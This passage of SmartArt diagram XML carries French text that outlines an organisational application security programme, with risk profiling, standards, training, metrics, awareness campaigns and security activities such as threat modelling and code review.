            <a:t> des </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>risques</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>avec un ensemble cohérent de probabilité et de facteurs d'impact reflétant la tolérance de votre organisation pour le risque.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53CD5622-4FF7-42BA-82CF-9FA917848989}" type="parTrans" cxnId="{6010088D-1046-466A-BB02-8A55CE262380}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6249606A-E44B-456D-8550-331FDC0465D3}" type="sibTrans" cxnId="{6010088D-1046-466A-BB02-8A55CE262380}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDF0D463-07CB-4904-B045-2FC63D99B581}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0" smtClean="0"/>
            <a:t>Partez sur des bases solides</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0"/>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algn="just" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
            <a:t>Adoptez</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
            <a:t>une</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
            <a:t>liste</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
            <a:t>précise</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>normes</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t> et standards</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>définissant les règles de base de la sécurité des applications qui devront être adoptées par les équipes de développement.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>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algn="just" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
            <a:t>Définissez</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
            <a:t>une</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>liste commune de contrôles périodiques </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>qui complètent ces </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>politiques et normes et qui fournisse </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" dirty="0" smtClean="0"/>
            <a:t>les conseils  de conception et de développement sur leur utilisation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>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algn="just" rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Mettez en place un </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>programme de formation spécifique à la sécurité des applications</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t> s'adressant aux différents métiers et sujets de développement.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>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C40210B5-480D-4766-978A-36F3F23CB9B8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0" smtClean="0"/>
            <a:t>Rendez vos indicateurs visibles</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0"/>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algn="just" rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Gérez avec des métriques. Pilotez les décisions de financement et d'amélioration en vous basant sur les métriques et les données d'analyse recensées. Les métriques comprennent le respect des pratiques / activités de sécurité, les vulnérabilités introduites, les vulnérabilités atténuées, la couverture de l'application,  la densité de défauts par type et par nombre d'instances, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0"/>
            <a:t>etc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>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algn="just" rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Analysez les données des activités de mise en œuvre et de vérification pour rechercher la  cause première et des modèles de vulnérabilité pour conduire des améliorations stratégiques et systémiques à travers l'entreprise</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>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algn="just"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Procédez à une </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>analyse des lacunes des capacités comparant votre organisation à vos pairs</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t> pour définir les principaux axes d'amélioration et un plan d'exécution.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>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algn="just"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Faites entériner ce programme par la </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Direction </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>et lancez une </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>campagne </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>sensibilisation à la sécurité </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>des </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>applications</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t> pour l'ensemble de l'organisation informatique.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>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8D122DB6-6C0E-4D20-A72C-736DE21EC8D0}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" dirty="0" smtClean="0"/>
            <a:t>Établissez des directives d'assurance pour définir correctement la couverture et le niveau de rigueur requis.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{070C93F6-752D-4DBB-9D29-5B772454B72B}" type="parTrans" cxnId="{460129C2-D5FA-4B36-A2D9-CA50D3D26274}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7732DA14-DAD9-46E0-81D8-10D0187DA04D}" type="sibTrans" cxnId="{460129C2-D5FA-4B36-A2D9-CA50D3D26274}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71911432-F414-4A80-97A8-23501F7683A0}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Créer un modèle de profil de risque applicatif pour mesurer et hiérarchiser vos applications.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8A9FA216-0683-4A46-B1D2-037BC7F64BD6}" type="parTrans" cxnId="{532B2766-C9B6-4855-8300-0EA1EC2F21E7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{311F234A-65E6-4DDB-B158-B9432A520F07}" type="sibTrans" cxnId="{532B2766-C9B6-4855-8300-0EA1EC2F21E7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1FE8A14D-88E8-4809-80E0-7B4946E452E5}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
            <a:t>Fournissez</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>des </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>services de support et d’</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>expertise</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t> à disposition des équipes de développement et de gestion de projet</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t> pour réussir.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A22B486-9496-4AAD-B682-1802E2A01EDC}" type="parTrans" cxnId="{AE4F3A7F-7D90-423A-8FE2-582943274445}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{683143C8-F466-4015-B806-0195AE0F2382}" type="sibTrans" cxnId="{AE4F3A7F-7D90-423A-8FE2-582943274445}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0" smtClean="0"/>
            <a:t>Intégrez la sécurité dans les processus existants</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" type="sibTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BC25BDC-3278-4082-B675-15E8A5144241}" type="parTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DAE1B00-ED9C-430F-B339-41CFF77CEF7B}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" dirty="0" smtClean="0"/>
            <a:t>Définissez et intégrez les activités </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>d’implémentation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" dirty="0" smtClean="0"/>
            <a:t> et de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>vérification</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" dirty="0" smtClean="0"/>
            <a:t> de la sécurité dans les processus de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" dirty="0" smtClean="0"/>
            <a:t>développement et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" dirty="0" smtClean="0"/>
            <a:t>opérationnels existant</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>. Les activités comprennent </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>modélisation des menaces</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, conception sécurisée &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, programmation sécurisée et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>revue de code</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>tests de pénétration</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t> et remédiation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42905EBD-BA0A-4D34-9CED-A12597E21E2C}" type="parTrans" cxnId="{B4D0A942-B31E-484E-BF58-C9B3ED185E9E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55366D54-64C0-4D0E-9E4C-F6822D37BB09}" type="sibTrans" cxnId="{B4D0A942-B31E-484E-BF58-C9B3ED185E9E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5" custScaleX="29073">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" type="pres">
      <dgm:prSet presAssocID="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" type="pres">
      <dgm:prSet presAssocID="{D22B1E2D-9241-472F-8A9E-565E70887137}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" type="pres">
      <dgm:prSet presAssocID="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5" custScaleX="103726">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
